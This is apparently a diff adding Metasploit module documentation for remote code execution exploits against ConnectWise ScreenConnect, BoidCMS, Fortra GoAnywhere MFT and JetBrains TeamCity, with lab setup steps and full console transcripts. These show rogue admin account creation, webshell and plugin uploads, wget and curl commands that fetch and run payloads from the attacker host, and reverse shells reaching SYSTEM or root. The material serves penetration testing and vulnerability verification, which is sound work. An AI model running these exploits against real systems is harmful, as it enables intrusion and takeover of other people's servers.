+   RHOSTS   192.168.86.50    yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+   RPORT    8040             yes       The target port (TCP)
+   SSL      false            no        Negotiate SSL/TLS for outgoing connections
+   VHOST                     no        HTTP server virtual host
+
+
+Payload options (cmd/windows/http/x64/meterpreter/reverse_tcp):
+
+   Name                Current Setting  Required  Description
+   ----                ---------------  --------  -----------
+   EXITFUNC            thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
+   FETCH_COMMAND       CERTUTIL         yes       Command to fetch payload (Accepted: CURL, TFTP, CERTUTIL)
+   FETCH_DELETE        false            yes       Attempt to delete the binary after execution
+   FETCH_FILENAME      qawpczANW        no        Name to use on remote system when storing payload; cannot contain spaces or slashes
+   FETCH_SRVHOST                        no        Local IP to use for serving payload
+   FETCH_SRVPORT       8080             yes       Local port to use for serving payload
+   FETCH_URIPATH                        no        Local URI to use for serving payload
+   FETCH_WRITABLE_DIR  %TEMP%           yes       Remote writable dir to store payload; cannot contain spaces.
+   LHOST               eth0             yes       The listen address (an interface may be specified)
+   LPORT               4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   1   Windows Command
+
+
+
+View the full module info with the info, or info -d command.
+
+msf6 exploit(multi/http/connectwise_screenconnect_rce_cve_2024_1709) > check
+[*] 192.168.86.50:8040 - The target appears to be vulnerable. ConnectWise ScreenConnect 23.9.7 running on Windows.
+msf6 exploit(multi/http/connectwise_screenconnect_rce_cve_2024_1709) > exploit
+
+[*] Started reverse TCP handler on 192.168.86.42:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. ConnectWise ScreenConnect 23.9.7 running on Windows.
+[*] Created account: jwrrtiro:Jd6PXdiH2MwGw2Nq (Note: This account will not be deleted by the module)
+[*] Uploaded Extension: c9bf4ee9-90b2-1ba7-ae4c-54ba6ee36a81
+[*] Removing Extension: c9bf4ee9-90b2-1ba7-ae4c-54ba6ee36a81
+[*] Sending stage (201798 bytes) to 192.168.86.50
+[+] Deleted C:\Program Files (x86)\ScreenConnect\App_Extensions\nayjdyti.ashx
+[*] Meterpreter session 3 opened (192.168.86.42:4444 -> 192.168.86.50:50550) at 2024-02-22 14:45:01 +0000
+
+meterpreter > getuid
+Server username: NT AUTHORITY\SYSTEM
+meterpreter > sysinfo
+Computer        : WIN-V28QNSO2H05
+OS              : Windows Server 2022 (10.0 Build 20348).
+Architecture    : x64
+System Language : en_US
+Domain          : WORKGROUP
+Logged On Users : 1
+Meterpreter     : x64/windows
+meterpreter > pwd
+C:\Windows\system32
+meterpreter > exit
+[*] Shutting down session: 3
+
+[*] 192.168.86.50 - Meterpreter session 3 closed.  Reason: User exit
+msf6 exploit(multi/http/connectwise_screenconnect_rce_cve_2024_1709) >
+```
+
+#### Linux Command
+
+Note: Linux targets run an older version of ScreenConnect, which require an older version of Linux (Ubuntu 18.04 in
+our testing), so `CURL` may not be available, the `FETCH_COMMAND` can be set to `WGET` instead. The `FETCH_WRITABLE_DIR`
+should be set to a suitable value like `/tmp`.
+
+```
+msf6 exploit(multi/http/connectwise_screenconnect_rce_cve_2024_1709) > set RHOST 192.168.86.72
+RHOST => 192.168.86.72
+msf6 exploit(multi/http/connectwise_screenconnect_rce_cve_2024_1709) > set target 2
+target => 2
+msf6 exploit(multi/http/connectwise_screenconnect_rce_cve_2024_1709) > set payload cmd/linux/http/x64/meterpreter/reverse_tcp 
+payload => cmd/linux/http/x64/meterpreter/reverse_tcp
+msf6 exploit(multi/http/connectwise_screenconnect_rce_cve_2024_1709) > set FETCH_COMMAND WGET
+FETCH_COMMAND => WGET
+msf6 exploit(multi/http/connectwise_screenconnect_rce_cve_2024_1709) > set FETCH_WRITABLE_DIR /tmp
+FETCH_WRITABLE_DIR => /tmp
+msf6 exploit(multi/http/connectwise_screenconnect_rce_cve_2024_1709) > show options
+
+Module options (exploit/multi/http/connectwise_screenconnect_rce_cve_2024_1709):
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS   192.168.86.72    yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+   RPORT    8040             yes       The target port (TCP)
+   SSL      false            no        Negotiate SSL/TLS for outgoing connections
+   VHOST                     no        HTTP server virtual host
+
+
+Payload options (cmd/linux/http/x64/meterpreter/reverse_tcp):
+
+   Name                Current Setting  Required  Description
+   ----                ---------------  --------  -----------
+   FETCH_COMMAND       WGET             yes       Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
+   FETCH_DELETE        false            yes       Attempt to delete the binary after execution
+   FETCH_FILENAME      whUoZoNn         no        Name to use on remote system when storing payload; cannot contain spaces or slashes
+   FETCH_SRVHOST                        no        Local IP to use for serving payload
+   FETCH_SRVPORT       8080             yes       Local port to use for serving payload
+   FETCH_URIPATH                        no        Local URI to use for serving payload
+   FETCH_WRITABLE_DIR  /tmp             yes       Remote writable dir to store payload; cannot contain spaces
+   LHOST               eth0             yes       The listen address (an interface may be specified)
+   LPORT               4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   2   Linux Command
+
+
+
+View the full module info with the info, or info -d command.
+
+msf6 exploit(multi/http/connectwise_screenconnect_rce_cve_2024_1709) > check
+[*] 192.168.86.72:8040 - The target appears to be vulnerable. ConnectWise ScreenConnect 20.3.31734 running on Linux.
+msf6 exploit(multi/http/connectwise_screenconnect_rce_cve_2024_1709) > exploit
+
+[*] Started reverse TCP handler on 192.168.86.42:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. ConnectWise ScreenConnect 20.3.31734 running on Linux.
+[!] Did not locate the __VIEWSTATEGENERATOR.
+[!] Did not locate the __VIEWSTATEGENERATOR.
+[*] Created account: mvyzbmti:HhstWDEb59XYRfME (Note: This account will not be deleted by the module)
+[!] Could not locate anti forgery token after login with admin credentials.
+[*] Uploaded Extension: 347933e7-dbaf-1c86-eca1-2a873c31b04d
+[*] Sending stage (3045380 bytes) to 192.168.86.72
+[*] Removing Extension: 347933e7-dbaf-1c86-eca1-2a873c31b04d
+[+] Deleted App_Extensions/pxstqhwe.ashx
+[*] Meterpreter session 4 opened (192.168.86.42:4444 -> 192.168.86.72:36862) at 2024-02-22 14:47:33 +0000
+
+meterpreter > getuid
+Server username: root
+meterpreter > sysinfo
+Computer     : 192.168.86.72
+OS           : Ubuntu 18.04 (Linux 5.4.0-84-generic)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter > pwd
+/opt/screenconnect
+meterpreter > exit
+[*] Shutting down session: 4
+
+[*] 192.168.86.72 - Meterpreter session 4 closed.  Reason: User exit
+msf6 exploit(multi/http/connectwise_screenconnect_rce_cve_2024_1709) >
+```
@@ -0,0 +1,234 @@
+## Vulnerable Application
+
+This module leverages CVE-2023-38836, an improper sanitization bug in BoidCMS version 2.0.0
+and below.  BoidCMS allows the authenticated upload of a php file as media if the file has
+the GIF header, even if the file is a php file.
+Once the file is uploaded, a user can then feed a command to the php file in a `GET` request.
+
+## Installation
+
+### Ubuntu 22.01.1x64 (Any 'nix should work)
+1. `sudo apt-get install apache2 #install apache`
+2. `sudo apt-get install php8.0 #install php`
+3. `sudo a2enmod rewrite #enable mod_rewrite`
+4. `sudo systemctl restart apache2 #restart apache2`
+5. Follow installation instructions here: https://boidcms.github.io/#/install 
+   a. download https://github.com/BoidCMS/BoidCMS/archive/refs/tags/v2.0.0.zip, unzip, and place
+      the contents into the `/var/www/html/` folder on the apache server.
+   b. Add
+      `$App->page = ltrim( $_SERVER[ 'PATH_INFO' ] ?? '', '/' );`
+      before the following line:
+      `$App->render();`
+6. `reboot`
+7. `cd /var/www/html`
+8. `sudo php -S [ip_address]:8080 #start php server`
+
+### Windows 2019 server (Any Windows should work)
+1. Download and install XMAPP for Windows from https://www.apachefriends.org/download.html
+2. Reboot
+3. Open XAMPP Control panel as admin.
+4. Follow installation instructions here: https://boidcms.github.io/#/install
+   a. download https://github.com/BoidCMS/BoidCMS/archive/refs/tags/v2.0.0.zip, unzip, and place
+      the contents into the `C:\xampp\htdocs\` folder on the apache server.
+   b. Add
+      `$App->page = ltrim( $_SERVER[ 'PATH_INFO' ] ?? '', '/' );`
+      before the following line:
+      `$App->render();`
+5. Verify that mod_rewrite is enabled for Apache.
+   a. Click on the `Config` button beside the Apache status in XAMPP Control panel
+   b. Select the httpd.conf
+   c. Verify `LoadModule rewrite_module modules/mod_rewrite.so` is uncommented
+   d. Restart Apache if you needed to uncomment the above line
+6. Start the php server
+   a. Open cmd window as Administrator
+   b. `cd C:\xampp\htdocs\`
+   c. `C:\xampp\php\php.exe -S 10.5.134.102:8080` #I don't know why we start the server on port 8080,
+      but on windows, we access with the rport value of 80.
+
+## Verification Steps
+
+1. Install BoidCMS
+1. Start msfconsole
+1. Do: `use exploit/multi/http/cve_2023_38836_boidcms`
+1. Do: `set CMS_USERNAME [username]`
+1. Do: `set CMS_PASSWORD [password]`
+1. Do: `set TARGETURI [target uri]`
+1. Do: `run`
+1. You should get a shell.
+
+## Options
+
+### CMS_USERNAME
+The username for the BoidCMS admin panel.  Default is `admin`
+
+### CMS_PASSWORD
+The username for the BoidCMS admin panel.  Default is `password`
+
+### TARGETURI
+The root of the web page BoidCMS manages. Empty string by default.
+
+## Scenarios
+
+### BoidCMS on Ubuntu 22.04.1x64
+
+```
+msf6 exploit(multi/http/cve_2023_38836_boidcms) > show options
+
+Module options (exploit/multi/http/cve_2023_38836_boidcms):
+
+   Name          Current Setting  Required  Description
+   ----          ---------------  --------  -----------
+   CMS_PASSWORD  password         yes       Password
+   CMS_USERNAME  admin            yes       Username
+   PHP_FILENAME  eI1lHLx.php      yes       The name for the php file to upload
+   Proxies                        no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS        10.5.134.129     yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-
+                                            metasploit.html
+   RPORT         8080             yes       The target port (TCP)
+   SSL           false            no        Negotiate SSL/TLS for outgoing connections
+   TARGETURI                      yes       The path
+   VHOST                          no        HTTP server virtual host
+
+
+Payload options (cmd/linux/http/x64/meterpreter/reverse_tcp):
+
+   Name                Current Setting  Required  Description
+   ----                ---------------  --------  -----------
+   FETCH_COMMAND       WGET             yes       Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
+   FETCH_DELETE        false            yes       Attempt to delete the binary after execution
+   FETCH_FILENAME      LZfjvRRrNR       no        Name to use on remote system when storing payload; cannot contain spaces.
+   FETCH_SRVHOST                        no        Local IP to use for serving payload
+   FETCH_SRVPORT       8080             yes       Local port to use for serving payload
+   FETCH_URIPATH                        no        Local URI to use for serving payload
+   FETCH_WRITABLE_DIR  /tmp             yes       Remote writable dir to store payload; cannot contain spaces.
+   LHOST               10.5.135.201     yes       The listen address (an interface may be specified)
+   LPORT               4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   nix Command
+
+
+
+View the full module info with the info, or info -d command.
+
+msf6 exploit(multi/http/cve_2023_38836_boidcms) > run
+
+[*] Command to run on remote host: wget -qO /tmp/oEsnOArk http://10.5.135.201:8080/v3vZxR3P-stuKWjUe6pCeA; chmod +x /tmp/oEsnOArk; /tmp/oEsnOArk &
+[*] Fetch Handler listening on 10.5.135.201:8080
+[*] HTTP server started
+[*] Adding resource /v3vZxR3P-stuKWjUe6pCeA
+[*] Started reverse TCP handler on 10.5.135.201:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[!] The service is running, but could not be validated. Detected BoidCMS, but the version is unknown.
+[*] Getting Token
+[*] Logging into CMS
+[*] Uploading PHP file eI1lHLx.php
+[*] launching Payload
+[*] Client 10.5.134.129 requested /v3vZxR3P-stuKWjUe6pCeA
+[*] Sending payload to 10.5.134.129 (Wget/1.21.2)
+[*] Transmitting intermediate stager...(126 bytes)
+[*] Sending stage (3045380 bytes) to 10.5.134.129
+[+] Deleted eI1lHLx.php
+[*] Meterpreter session 1 opened (10.5.135.201:4444 -> 10.5.134.129:49168) at 2024-02-16 16:32:33 -0600
+
+meterpreter > sysinfo
+Computer     : 10.5.134.129
+OS           : Ubuntu 22.04 (Linux 6.5.0-17-generic)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter > getuid
+Server username: root
+meterpreter > 
+
+
+
+```
+
+
+### BoidCMS on Windows Server 2019x64
+
+```
+msf6 exploit(multi/http/cve_2023_38836_boidcms) > show options
+
+Module options (exploit/multi/http/cve_2023_38836_boidcms):
+
+   Name          Current Setting  Required  Description
+   ----          ---------------  --------  -----------
+   CMS_PASSWORD  password         yes       Password
+   CMS_USERNAME  admin            yes       Username
+   PHP_FILENAME  eI1lHLx.php      yes       The name for the php file to upload
+   Proxies                        no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS        10.5.134.102     yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-
+                                            metasploit.html
+   RPORT         80               yes       The target port (TCP)
+   SSL           false            no        Negotiate SSL/TLS for outgoing connections
+   TARGETURI                      yes       The path
+   VHOST                          no        HTTP server virtual host
+
+
+Payload options (cmd/windows/http/x64/meterpreter_reverse_tcp):
+
+   Name                Current Setting  Required  Description
+   ----                ---------------  --------  -----------
+   EXITFUNC            process          yes       Exit technique (Accepted: '', seh, thread, process, none)
+   EXTENSIONS                           no        Comma-separate list of extensions to load
+   EXTINIT                              no        Initialization strings for extensions
+   FETCH_COMMAND       CURL             yes       Command to fetch payload (Accepted: CURL, TFTP, CERTUTIL)
+   FETCH_DELETE        false            yes       Attempt to delete the binary after execution
+   FETCH_FILENAME      EwRzYaki         no        Name to use on remote system when storing payload; cannot contain spaces.
+   FETCH_SRVHOST                        no        Local IP to use for serving payload
+   FETCH_SRVPORT       8080             yes       Local port to use for serving payload
+   FETCH_URIPATH                        no        Local URI to use for serving payload
+   FETCH_WRITABLE_DIR  %TEMP%           yes       Remote writable dir to store payload; cannot contain spaces.
+   LHOST               10.5.135.201     yes       The listen address (an interface may be specified)
+   LPORT               4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   1   Windows Command
+
+
+
+View the full module info with the info, or info -d command.
+
+msf6 exploit(multi/http/cve_2023_38836_boidcms) > run
+
+[*] Command to run on remote host: curl -so %TEMP%\YnmWUfMzCxY.exe http://10.5.135.201:8080/h8r3u5VU3v-qeqUW3_anLw & start /B %TEMP%\YnmWUfMzCxY.exe
+[*] Fetch Handler listening on 10.5.135.201:8080
+[*] HTTP server started
+[*] Adding resource /h8r3u5VU3v-qeqUW3_anLw
+[*] Started reverse TCP handler on 10.5.135.201:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[!] The service is running, but could not be validated. Detected BoidCMS, but the version is unknown.
+[*] Getting Token
+[*] Logging into CMS
+[*] Uploading PHP file eI1lHLx.php
+[*] launching Payload
+[*] Client 10.5.134.102 requested /h8r3u5VU3v-qeqUW3_anLw
+[*] Sending payload to 10.5.134.102 (curl/7.55.1)
+[+] Deleted eI1lHLx.php
+[*] Meterpreter session 4 opened (10.5.135.201:4444 -> 10.5.134.102:50085) at 2024-02-16 16:41:48 -0600
+
+meterpreter > sysinfo
+Computer        : WIN-2E6BPFGP9F7
+OS              : Windows Server 2019 (10.0 Build 17763).
+Architecture    : x64
+System Language : en_US
+Domain          : WORKGROUP
+Logged On Users : 2
+Meterpreter     : x64/windows
+meterpreter > getuid
+Server username: WIN-2E6BPFGP9F7\msfuser
+meterpreter > getsystem
+...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
+meterpreter > 
+
+```
@@ -0,0 +1,166 @@
+## Vulnerable Application
+This module exploits a vulnerability in Fortra GoAnywhere MFT that allows an unauthenticated attacker to
+create a new administrator account. This can be leveraged to upload a JSP payload and achieve RCE. GoAnywhere
+MFT versions 6.x from 6.0.1, and 7.x before 7.4.1 are vulnerable.
+
+## Testing
+To test use Fortra GoAnywhere 7.4.0. You will need to register for a trial from the Fortra website in order to
+receive a 30 day trial license. The portal where you receive a trial license will only let you download the most
+recent version of the product, so you will also need to have access to an installer for an older, vulnerable version
+of the product to install and test on.
+
+## Verification Steps
+The exploits default target 0 (Automatic), will detect the target systems OS, so you do not need to specify the target
+OS (Linux or Windows).
+
+1. Start msfconsole
+2. `use exploit/multi/http/fortra_goanywhere_mft_rce_cve_2024_0204`
+3. `set RHOST <TARGET_IP_ADDRESS>`
+4. `set target 0`
+5. `set PAYLOAD java/jsp_shell_reverse_tcp`
+6. `check`
+7. `exploit`
+
+## Options
+
+### GOANYWHERE_INSTALL_PATH
+This is the file system path to the GoAnywhere MFT installation. If the target is set to `Automatic`, then this path
+will be discovered automatically.
+
+## Scenarios
+The Automatic target will detect the GoAnywhere MFT servers OS and select the correct target, or you can explicitly
+select a target platform (Linux or Windows).
+
+### Automatic (Linux)
+
+```
+msf6 exploit(multi/http/fortra_goanywhere_mft_rce_cve_2024_0204) > show options
+
+Module options (exploit/multi/http/fortra_goanywhere_mft_rce_cve_2024_0204):
+
+   Name       Current Setting  Required  Description
+   ----       ---------------  --------  -----------
+   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS     10.100.1.30      yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-meta
+                                         sploit.html
+   RPORT      8001             yes       The target port (TCP)
+   SSL        true             no        Negotiate SSL/TLS for outgoing connections
+   TARGETURI  /goanywhere/     yes       The base path to the web application
+   VHOST                       no        HTTP server virtual host
+
+
+Payload options (java/jsp_shell_reverse_tcp):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST  10.100.1.10      yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+   SHELL                   no        The system shell to use.
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Automatic
+
+
+
+View the full module info with the info, or info -d command.
+
+msf6 exploit(multi/http/fortra_goanywhere_mft_rce_cve_2024_0204) > check
+[*] 10.100.1.30:8001 - The target appears to be vulnerable. GoAnywhere MFT 7.4.0
+msf6 exploit(multi/http/fortra_goanywhere_mft_rce_cve_2024_0204) > exploit
+
+[*] Started reverse TCP handler on 10.100.1.10:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. GoAnywhere MFT 7.4.0
+[*] Created account: uchvkpgt:ZindpxggDdvtrxu3
+[*] Automatic targeting, detected OS: Linux
+[*] Automatic targeting, detected install path: /opt/HelpSystems/GoAnywhere
+[*] Dropped payload: /opt/HelpSystems/GoAnywhere/adminroot/EIlMlYdQ.jsp
+[+] Deleted /opt/HelpSystems/GoAnywhere/adminroot/EIlMlYdQ.jsp
+[!] Tried to delete /opt/HelpSystems/GoAnywhere/userdata/documents/uchvkpgt/EIlMlYdQ.jsp, unknown result
+[+] Deleted /opt/HelpSystems/GoAnywhere/userdata/documents/uchvkpgt/
+[*] Command shell session 4 opened (10.100.1.10:4444 -> 10.100.1.30:49572) at 2024-01-29 17:49:08 +0000
+
+id
+uid=1002(gamft) gid=1002(gamft) groups=1002(gamft)
+pwd
+/opt/HelpSystems/GoAnywhere
+uname -a
+Linux ubuntu-test-vm 6.5.0-15-generic #15~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Fri Jan 12 18:54:30 UTC 2 x86_64 x86_64 x86_64 GNU/Linux
+exit
+[*] 10.100.1.30 - Command shell session 8 closed.
+msf6 exploit(multi/http/fortra_goanywhere_mft_rce_cve_2024_0204) >
+```
+
+### Automatic (Windows)
+
+```
+msf6 exploit(multi/http/fortra_goanywhere_mft_rce_cve_2024_0204) > show options
+
+Module options (exploit/multi/http/fortra_goanywhere_mft_rce_cve_2024_0204):
+
+   Name       Current Setting  Required  Description
+   ----       ---------------  --------  -----------
+   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS     10.100.1.20      yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-meta
+                                         sploit.html
+   RPORT      8001             yes       The target port (TCP)
+   SSL        true             no        Negotiate SSL/TLS for outgoing connections
+   TARGETURI  /goanywhere/     yes       The base path to the web application
+   VHOST                       no        HTTP server virtual host
+
+
+Payload options (java/jsp_shell_reverse_tcp):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST  10.100.1.10      yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+   SHELL                   no        The system shell to use.
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Automatic
+
+
+
+View the full module info with the info, or info -d command.
+
+msf6 exploit(multi/http/fortra_goanywhere_mft_rce_cve_2024_0204) > check
+[*] 10.100.1.20:8001 - The target appears to be vulnerable. GoAnywhere MFT 7.4.0
+msf6 exploit(multi/http/fortra_goanywhere_mft_rce_cve_2024_0204) > exploit
+
+[*] Started reverse TCP handler on 10.100.1.10:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. GoAnywhere MFT 7.4.0
+[*] Created account: ckgbeqlo:ib0Qk3cMDvnaipTP
+[*] Automatic targeting, detected OS: Windows
+[*] Automatic targeting, detected install path: C:\Program Files\Fortra\GoAnywhere
+[*] Dropped payload: C:\Program Files\Fortra\GoAnywhere\adminroot\b9OvIFdK.jsp
+[!] Tried to delete C:\Program Files\Fortra\GoAnywhere\adminroot\b9OvIFdK.jsp, unknown result
+[!] Tried to delete C:\Program Files\Fortra\GoAnywhere\userdata\documents\ckgbeqlo\b9OvIFdK.jsp, unknown result
+[*] Command shell session 9 opened (10.100.1.10:4444 -> 10.100.1.20:57059) at 2024-01-29 16:31:01 +0000
+[!] This exploit may require manual cleanup of 'C:\Program Files\Fortra\GoAnywhere\userdata\documents\ckgbeqlo\' on the target
+
+
+Shell Banner:
+Microsoft Windows [Version 10.0.20348.1607]
+(c) Microsoft Corporation. All rights reserved.
+-----
+          
+
+C:\Program Files\Fortra\GoAnywhere>whoami
+whoami
+nt authority\system
+
+C:\Program Files\Fortra\GoAnywhere>exit
+exit
+[*] 10.100.1.20 - Command shell session 9 closed.
+msf6 exploit(multi/http/fortra_goanywhere_mft_rce_cve_2024_0204) > 
+```
@@ -0,0 +1,448 @@
+## Vulnerable Application
+This module exploits an authentication bypass vulnerability in JetBrains TeamCity. An unauthenticated
+attacker can leverage this to access the REST API and create a new administrator access token. This token
+can be used to upload a plugin which contains a Metasploit payload, allowing the attacker to achieve
+unauthenticated RCE on the target TeamCity server. On older versions of TeamCity, access tokens do not exist
+so the exploit will instead create a new administrator account before uploading a plugin. Older version of
+TeamCity have a debug endpoint (/app/rest/debug/process) that allows for arbitrary commands to be executed,
+however recent version of TeamCity no longer ship this endpoint, hence why a plugin is leveraged for code
+execution instead, as this is supported on all versions tested.
+
+For a technical analysis of the vulnerability, read our [Rapid7 Analysis](https://attackerkb.com/topics/K3wddwP3IJ/cve-2024-27198/rapid7-analysis).
+
+## Testing
+[Download](https://www.jetbrains.com/teamcity/download/) and
+[install](https://www.jetbrains.com/help/teamcity/install-and-start-teamcity-server.html) a vulnerable version of
+TeamCity for either Windows or Linux, e.g. version 2023.11.3. By default the server will listen for HTTP
+connections on port 8111 (Older version of the product listen on port 80 by default).
+
+The exploit has been tested against:
+ * TeamCity 2023.11.3 (build 147512) running on Windows Server 2022
+ * TeamCity 2023.11.2 (build 147486) running on Windows Server 2022
+ * TeamCity 2023.11.3 (build 147512) running on Linux
+ * TeamCity 2018.2.4 (build 61678) running on Windows Server 2016
+
+## Verification Steps
+Note: On Windows, disable Defender if you are using the default payloads.
+
+Note: The check routine will display the target platform, this can be used to decide what target to select if the
+command payloads are to be used. The Java payloads are platform agnostic.
+
+1. Start msfconsole
+2. `use exploit/multi/http/jetbrains_teamcity_rce_cve_2024_27198`
+3. `set RHOST <TARGET_IP_ADDRESS>`
+4. `set target 0`
+5. `set payload java/meterpreter/reverse_tcp`
+6. `set LHOST eth0`
+7. `check`
+8. `exploit`
+
+## Options
+
+### TEAMCITY_ADMIN_ID
+The user ID of an administrator account on the server. As the first user created during installation is an
+administrator account, the ID will be 1 by default.
+
+## Scenarios
+
+### Java
+
+```
+msf6 > use exploit/multi/http/jetbrains_teamcity_rce_cve_2024_27198 
+[*] No payload configured, defaulting to java/meterpreter/reverse_tcp
+msf6 exploit(multi/http/jetbrains_teamcity_rce_cve_2024_27198) > set RHOST 192.168.86.68
+RHOST => 192.168.86.68
+msf6 exploit(multi/http/jetbrains_teamcity_rce_cve_2024_27198) > check
+[+] 192.168.86.68:8111 - The target is vulnerable. JetBrains TeamCity 2023.11.3 (build 147512) running on Windows Server 2022.
+msf6 exploit(multi/http/jetbrains_teamcity_rce_cve_2024_27198) > show targets
+
+Exploit targets:
+=================
+
+    Id  Name
+    --  ----
+=>  0   Java
+    1   Java Server Page
+    2   Windows Command
+    3   Linux Command
+    4   Unix Command
+
+
+msf6 exploit(multi/http/jetbrains_teamcity_rce_cve_2024_27198) > set target 0
+target => 0
+msf6 exploit(multi/http/jetbrains_teamcity_rce_cve_2024_27198) > set payload java/meterpreter/reverse_tcp 
+payload => java/meterpreter/reverse_tcp
+msf6 exploit(multi/http/jetbrains_teamcity_rce_cve_2024_27198) > set LHOST eth0
+LHOST => eth0
+msf6 exploit(multi/http/jetbrains_teamcity_rce_cve_2024_27198) > show options
+
+Module options (exploit/multi/http/jetbrains_teamcity_rce_cve_2024_27198):
+
+   Name               Current Setting  Required  Description
+   ----               ---------------  --------  -----------
+   Proxies                             no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS             192.168.86.68    yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+   RPORT              8111             yes       The target port (TCP)
+   SSL                false            no        Negotiate SSL/TLS for outgoing connections
+   TARGETURI          /                yes       The base path to TeamCity
+   TEAMCITY_ADMIN_ID  1                yes       The ID of an administrator account to authenticate as
+   VHOST                               no        HTTP server virtual host
+
+
+Payload options (java/meterpreter/reverse_tcp):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST  eth0             yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Java
+
+
+
+View the full module info with the info, or info -d command.
+
+msf6 exploit(multi/http/jetbrains_teamcity_rce_cve_2024_27198) > exploit
+
+[*] Started reverse TCP handler on 192.168.86.42:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target is vulnerable. JetBrains TeamCity 2023.11.3 (build 147512) running on Windows Server 2022.
+[*] Created authentication token: eyJ0eXAiOiAiVENWMiJ9.c1hvczdQOUFMX2J5Z3NiZU9MYzFDSEdPQ213.Mzk3NmQ5MmQtOTBmOC00OGNjLTkyNWEtMzRhYWI2YzUwMTU4
+[*] Uploading plugin: TdbCU0EE
+[*] Sending stage (57971 bytes) to 192.168.86.68
+[*] Meterpreter session 1 opened (192.168.86.42:4444 -> 192.168.86.68:53099) at 2024-02-23 14:13:22 +0000
+[*] Deleting the plugin...
+[*] Deleting the authentication token...
+[!] This exploit may require manual cleanup of 'C:\TeamCity\webapps\ROOT\plugins\TdbCU0EE' on the target
+[!] This exploit may require manual cleanup of 'C:\TeamCity\work\Catalina\localhost\ROOT\TC_147512_TdbCU0EE' on the target
+[!] This exploit may require manual cleanup of 'C:\ProgramData\JetBrains\TeamCity\system\caches\plugins.unpacked\TdbCU0EE' on the target
+
+meterpreter > getuid
+Server username: WIN-CMULENHFCK7$
+meterpreter > sysinfo
+Computer        : WIN-CMULENHFCK7
+OS              : Windows Server 2022 10.0 (amd64)
+Architecture    : x64
+System Language : en_IE
+Meterpreter     : java/windows
+meterpreter > 
+```
+
+### Java Server Page
+
+```
+msf6 exploit(multi/http/jetbrains_teamcity_rce_cve_2024_27198) > set target 1
+target => 1
+msf6 exploit(multi/http/jetbrains_teamcity_rce_cve_2024_27198) > set payload java/jsp_shell_reverse_tcp 
+payload => java/jsp_shell_reverse_tcp
+msf6 exploit(multi/http/jetbrains_teamcity_rce_cve_2024_27198) > show options
+
+Module options (exploit/multi/http/jetbrains_teamcity_rce_cve_2024_27198):
+
+   Name               Current Setting  Required  Description
+   ----               ---------------  --------  -----------
+   Proxies                             no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS             192.168.86.68    yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+   RPORT              8111             yes       The target port (TCP)
+   SSL                false            no        Negotiate SSL/TLS for outgoing connections
+   TARGETURI          /                yes       The base path to TeamCity
+   TEAMCITY_ADMIN_ID  1                yes       The ID of an administrator account to authenticate as
+   VHOST                               no        HTTP server virtual host
+
+
+Payload options (java/jsp_shell_reverse_tcp):
+
+   Name           Current Setting  Required  Description
+   ----           ---------------  --------  -----------
+   CreateSession  true             no        Create a new session for every successful login
+   LHOST          eth0             yes       The listen address (an interface may be specified)
+   LPORT          4444             yes       The listen port
+   SHELL                           no        The system shell to use.
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   1   Java Server Page
+
+
+
+View the full module info with the info, or info -d command.
+
+msf6 exploit(multi/http/jetbrains_teamcity_rce_cve_2024_27198) > check
+[+] 192.168.86.68:8111 - The target is vulnerable. JetBrains TeamCity 2023.11.3 (build 147512) running on Windows Server 2022.
+msf6 exploit(multi/http/jetbrains_teamcity_rce_cve_2024_27198) > exploit
+
+[*] Started reverse TCP handler on 192.168.86.42:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
